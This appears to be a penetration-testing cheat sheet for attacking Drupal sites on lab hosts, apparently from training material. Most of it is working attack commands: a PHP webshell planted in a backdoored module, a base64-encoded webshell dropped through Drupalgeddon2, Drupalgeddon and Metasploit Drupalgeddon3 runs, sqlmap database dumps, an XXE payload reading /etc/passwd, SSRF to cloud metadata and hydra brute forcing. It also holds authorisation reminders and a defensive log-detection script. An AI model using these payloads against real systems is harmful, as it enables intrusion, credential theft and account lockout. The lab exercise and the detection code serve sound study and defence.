6. Attacking Drupal

1. PHP Filter Module Exploitation (Drupal < 8)

curl -s http://drupal-qa.inlanefreight.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id
  • Enable the PHP filter module and inject PHP through node content; the node URL above then runs the query-string value through the injected code.

  • Consideration: Agree with the client before enabling any module on their site.

2. Backdoored Module Upload

wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
echo '<?php system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);?>' > captcha/shell.php
printf '<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\n</IfModule>\n' > captcha/.htaccess
tar czvf captcha.tar.gz captcha/
curl -s drupal.inlanefreight.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id
  • Upload malicious module via admin panel.

  • Consideration: Avoid modifying production systems without explicit permission.

3. Drupalgeddon (CVE-2014-3704)

python2.7 drupalgeddon.py -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd
  • Create admin user via SQL injection.

  • Consideration: Impact of creating unauthorized admin accounts.

4. Drupalgeddon2 (CVE-2018-7600)

python3 drupalgeddon2.py
echo "PD9waHAgc3lzdGVtKCRfR0VUW2ZlOGVkYmFiYzVjNWM5YjdiNzY0NTA0Y2QyMmIxN2FmXSk7Pz4K" | base64 -d | tee mrb3n.php
curl http://drupal-dev.inlanefreight.local/mrb3n.php?fe8edbabc5c5c9b7b764504cd22b17af=id
  • RCE via user registration form.

  • Consideration: Severity of unauthenticated RCE vulnerabilities.

5. Drupalgeddon3 (CVE-2018-7602)

msf6 > use exploit/multi/http/drupal_drupageddon3
msf6 > set rhosts 10.129.42.195
msf6 > set VHOST drupal-acc.inlanefreight.local
msf6 > set drupal_session SESS...
msf6 > set DRUPAL_NODE 1
msf6 > set LHOST 10.10.14.15
msf6 > exploit
  • RCE via Form API (requires authenticated session).

  • Consideration: Session hijacking risks.

6. Drupal Configuration File Exploitation/Security

curl -s http://drupal.inlanefreight.local/sites/default/settings.php
ls -l sites/default/settings.php
cat .htaccess
  • Check whether settings.php is served by the web server or is world-readable on the host; it contains the database credentials.

  • Consideration: Restrict permissions on settings.php and make sure the web server never serves it directly.

7. Database Exploitation (SQL Injection - Expanded)

curl "http://drupal.inlanefreight.local/node/1?id=1'--"
curl "http://drupal.inlanefreight.local/node/1?id=1' OR '1'='1"
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --dbs --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] --tables --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] --columns --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] -C [column1,column2] --dump --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --level 5 --risk 3
  • Manual and automated SQL injection testing; the id parameter in these URLs is illustrative, so point the requests at the parameter actually under test.

  • Consideration: Validate findings with a second tool or a manual request before reporting.

8. Form API Exploitation

curl -X POST -d "param1=value1&param2=payload" http://drupal.inlanefreight.local/form_path
  • Consideration: Burp Suite is very helpful for deeper analysis.

9. File Upload Vulnerabilities

curl -F "file=@malicious.php" http://drupal.inlanefreight.local/upload_path
  • Test various file extensions.

  • Consideration: Check whether the upload handler validates extension and MIME type server-side rather than trusting the client-supplied Content-Type.

10. Access Control Vulnerabilities

curl -I http://drupal.inlanefreight.local/admin
  • Check for a 200 response when not authenticated; Drupal should answer an anonymous request to /admin with 403.

  • Consideration: Test different user roles.

11. Session Management Vulnerabilities

  • Use Burp Suite's Sequencer and Session handling rules.

12. XML External Entity (XXE) Injection

curl -X POST -H "Content-Type: application/xml" -d '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>' http://drupal.inlanefreight.local/xml_endpoint

13. Server-Side Request Forgery (SSRF)

curl "http://drupal.inlanefreight.local/page?url=http://169.254.169.254/latest/meta-data/"
  • Consideration: Check response for internal metadata leaks.

14. Drupal Brute Forcing

hydra -l admin -P /usr/share/wordlists/rockyou.txt drupal.inlanefreight.local http-post-form "/user/login:name=^USER^&pass=^PASS^&form_id=user_login:Unrecognized username or password"
  • wpscan is WordPress-specific and does not enumerate Drupal users; hydra against the login form is the applicable approach here.

  • Drupal 7 posts form_id=user_login; Drupal 8 and later use form_id=user_login_form, and the failure string must match the site's actual login error text.

  • Consideration: Drupal core's flood control rate-limits failed logins per IP and per account, so brute forcing tends to lock the target account (an impact on the client) and leaves entries in the watchdog log that defenders can alert on.
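A defender-side log check for three of the activities on this page (the POST /user/login bursts from section 14, the Drupalgeddon2 request shape from section 4, and direct requests for PHP scripts such as the module webshell from sections 2 and 4), added here as an example and not part of the original page or the HTB material. The log lines are constructed, and the PHP allowlist, threshold and window are assumptions to tune for a given deployment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample lines in combined log format (not captured traffic).
SAMPLE_LOG = """\
10.10.14.15 - - [20/May/2024:10:00:01 +0000] "POST /user/login HTTP/1.1" 200 5120 "-" "Hydra"
10.10.14.15 - - [20/May/2024:10:00:02 +0000] "POST /user/login HTTP/1.1" 200 5120 "-" "Hydra"
10.10.14.15 - - [20/May/2024:10:00:03 +0000] "POST /user/login HTTP/1.1" 200 5120 "-" "Hydra"
10.10.14.15 - - [20/May/2024:10:00:04 +0000] "POST /user/login HTTP/1.1" 200 5120 "-" "Hydra"
10.10.14.15 - - [20/May/2024:10:01:10 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 310 "-" "python-requests"
10.10.14.15 - - [20/May/2024:10:01:11 +0000] "GET /modules/captcha/shell.php?cmd=id HTTP/1.1" 200 60 "-" "curl/7.88"
192.0.2.44 - - [20/May/2024:10:02:00 +0000] "GET /node/3 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.44 - - [20/May/2024:10:02:05 +0000] "POST /user/login HTTP/1.1" 303 0 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) ')
# CVE-2018-7600 requests put a render-array key ('#value', encoded %23) in element_parents;
# ajax_form=1&_wrapper_format=drupal_ajax on its own is ordinary Drupal AJAX traffic, so it is not a signal.
DRUPALGEDDON2 = re.compile(r"element_parents=[^ &]*(%23|#)", re.I)
# Drupal serves clean URLs; direct hits on PHP scripts outside this (assumed) allowlist suggest a webshell or exposed config.
PHP_ALLOWLIST = {"/index.php", "/update.php", "/install.php"}
PHP_REQ = re.compile(r"^(/[^ ?]*\.php)", re.I)

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path = m.groups()
    return {"ip": ip, "ts": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), "method": method, "path": path}

def detect(log_text, login_threshold=4, window=timedelta(seconds=60)):
    """Return (rule, source_ip, detail) tuples for the three patterns above."""
    alerts, logins = [], defaultdict(list)
    for line in log_text.splitlines():
        e = parse(line)
        if not e:
            continue
        if DRUPALGEDDON2.search(e["path"]):
            alerts.append(("drupalgeddon2_pattern", e["ip"], e["path"]))
        php = PHP_REQ.match(e["path"])
        if php and php.group(1).lower() not in PHP_ALLOWLIST:
            alerts.append(("direct_php_request", e["ip"], php.group(1)))
        if e["method"] == "POST" and e["path"].startswith("/user/login"):
            logins[e["ip"]].append(e["ts"])
    for ip, times in logins.items():  # sliding window over login POSTs per source IP
        times.sort()
        for i in range(len(times) - login_threshold + 1):
            if times[i + login_threshold - 1] - times[i] <= window:
                alerts.append(("login_burst", ip, f"{login_threshold}+ POST /user/login in {window.seconds}s"))
                break
    return alerts
```

Run `detect(SAMPLE_LOG)` to see one alert per rule for the constructed attacker IP; the benign second host produces none.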

Additional Notes:

  • Ensure Drupal versions are known before testing specific exploits.

  • Use enumeration tools like droopescan for discovering modules and themes.

  • After exploitation, re-test once patches and mitigations are applied to confirm the fixes actually close the issue.
